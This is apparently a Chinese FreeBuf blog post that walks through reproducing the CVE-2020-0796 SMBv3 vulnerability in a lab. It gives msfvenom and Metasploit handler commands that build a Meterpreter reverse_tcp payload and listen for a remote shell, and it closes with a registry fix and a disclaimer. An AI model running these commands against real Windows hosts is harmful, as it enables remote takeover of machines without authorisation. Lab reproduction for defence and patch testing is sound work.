freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

CVE-2020-0796 SMBv3漏洞复现过程
2020-10-18 19:34:41

1.扫描主机是否存在漏

扫描py文件链接

1603020591_5f8c272fee2fe4fa4ac1e.png!small

2.下载可利用的POC

poc地址

3.在kali里使用msfvenom生成shell,lhost是攻击机ip

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.236.130 lport=4444 -f py -o exp.py

1603020659_5f8c27738bb8f68c54954.png!small

4.将生成的shell替换poc文件夹里的exploit.py的USER_PAYLOAD,整个全部替换

1603020681_5f8c278955f82585fc104.png!small

5.进入msf开启监听

use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lport 4444
set lhost 192.168.236.130
run

6.运行exploit.py

1603020732_5f8c27bc61b98dd4bca36.png!small

7.查看监听是否收到

1603020757_5f8c27d5cf3ba336218f6.png!small

如果报错根据错误修改exploit.py的参数。

1603020776_5f8c27e882d1c56003ceb.png!small

修复建议:
禁用SMBv 3压缩,具体命令如下

Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters" DisableCompression -Type DWORD -Value 1 -Force

1603020810_5f8c280a7706c7b6b108c.png!small?1603020811293

1603020820_5f8c2814a6110b5a03b38.png!small?1603020821537

免责声明:本人坚决反对利用教学方法进行犯罪的行为,一切犯罪行为必将受到严惩,绿色网络需要我们共同维护,更推荐大家了解它们背后的原理,更好地进行防护。禁止任何人转载到其他站点,禁止用于任何非法用途。如有任何人凭此做何非法事情,均于笔者无关,特此声明。


# 漏洞
本文为 独立观点,未经允许不得转载,授权请联系FreeBuf客服小蜜蜂,微信:freebee2022
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
  • 0 文章数
  • 0 关注者
文章目录